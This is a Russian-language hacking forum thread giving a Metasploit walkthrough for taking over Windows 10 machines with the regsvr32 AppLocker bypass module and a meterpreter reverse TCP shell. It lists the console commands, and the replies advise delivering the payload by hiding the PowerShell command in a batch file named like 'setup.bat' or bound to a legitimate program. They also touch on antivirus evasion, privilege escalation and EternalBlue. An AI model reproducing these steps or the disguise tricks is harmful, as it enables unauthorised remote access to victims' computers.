Статья Hack Windows 10 (meterpreter)

Привет всем! В этой небольшой теме я хочу показать очередной способ взлома Windows, на этот раз это Windows 10. После обновления Metasploit в нем появился достаточно любопытный эксплоит (хотя, может он и раньше там был) - regsvr32_applocker_bypass_server

Итак, приступим, в терминале, вводим следующие команды:

> msfconsole (запускаем Metaslpoit)

> use exploit/windows/misc/regsvr32_applocker_bypass_server

> options (посмотрим доступные настройки эксплойта)

> set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.0.101 (Ваш локальный адрес)

> set LPORT 4444

> exploit

Если все прошло успешно видим следующее:

То, что я выделил цветом, это команда, которую необходимо ввести в командной строке целевого хоста, для получения сессии meterpreter.

После выполнения команды, в терминале Kali Linux откроется сессия:

> sessions –I 1 (Подключимся к ней)

> ps (Посмотрим список процессов на целевом хосте)

Тестировал я этот способ на реальном ПК с установленной на нем:

Спасибо за внимание.

 

[aircrack]

А теперь вопрос: как ввести эту команду на целевом хосте?

 

[Vander]

А теперь вопрос: как ввести эту команду на целевом хосте?

Это способ, а метод реализации может быть каким угодно

 

[Leon]

Анитиви непалят?

 

[m0tion]

Шелл от админа работает сразу или нужно делать privilege escalation?

 

[Vander]

Шелл от админа работает сразу или нужно делать privilege escalation?

Я делал privilege escalation, сначала

 

[OBLIVIONNN]

Куда пропал эксплоит ? Есть альтернативный быстрый способ для получения meterpreter, без создание вредоносного файла.

 

[AetoMynamy]

Куда пропал эксплоит ? Есть альтернативный быстрый способ для получения meterpreter, без создание вредоносного файла.

Он не пропал, переименовали

 

[Литиум]

Куда пропал эксплоит ? Есть альтернативный быстрый способ для получения meterpreter, без создание вредоносного файла.

Есть , но Vander рассматривает другой вариант.

 

[Tihon49]

Он не пропал, переименовали

Как его найти?

 

[AetoMynamy]

Командой search regsvr32
у него изменено расположение и видоизменено название, функционал и настроика та же

 

[Tihon49]

А теперь вопрос: как ввести эту команду на целевом хосте?

Ну самое простое, сделай батник с кодом внутри:

@powershell.exe сюда_копируй_команду

Потом можешь склеить с чем-нибудь годным.

 

[MirTex_LAN]

После выполнения команды в Powershell идёт бесконечная обработка запроса(Handling request from 192.*.*.*). В чем дело ?

 

[Metasploit228]

При вводе команды use exploit/windows/misc/regsvr32_applocker_bypass_server
Metasploit говорит что не может загрузить этот модуль. Что делать?

 

[Az1K]

При вводе команды use exploit/windows/misc/regsvr32_applocker_bypass_server
Metasploit говорит что не может загрузить этот модуль. Что делать?

поменяли имя. найди с помощью поиска команда search regsvr32

 

[Metasploit228]

поменяли имя. найди с помощью поиска команда search regsvr32

А вообще есть сейчас варик взлома десятки после последних патчей?

Ребят,а в чём вообще прикол? Пробовал юзать EthernalBlue на разных компах,разных версиях виндовс,всё равно сессию не получает? С чем могут быть связаны такие казусы? (Ломаю через Termux,всё прописываю правильно)

 

[Az1K]

А вообще есть сейчас варик взлома десятки после последних патчей?

Не знаю. Поищи в инете.

Ребят,а в чём вообще прикол? Пробовал юзать EthernalBlue на разных компах,разных версиях виндовс,всё равно сессию не получает? С чем могут быть связаны такие казусы? (Ломаю через Termux,всё прописываю правильно)

Наверняка установлен патч на целевом компе.

 

[Zitoon PROPVP]

Vander у меня есть вопрос можно ли с помощью метерпретер открыть консоль и закрывать окна (игры всякие) в винде,если да то можете пожалуйста обьяснить,(дать ссылку)как это сделать?

 

[Chak Anonim]

Я тебе конечно очень признателен как и все тут, но не суди строго.
Думаю всем нам будет лудьше если ты все эти команды будешь рассказывать(если кому не интересно, то можно делать в отдельной статье)

 

[D3L1F3R]

А теперь вопрос: как ввести эту команду на целевом хосте?

засунь в bat'ник(вроде так называются эти файлы) и назови типо "setup.bat" и всё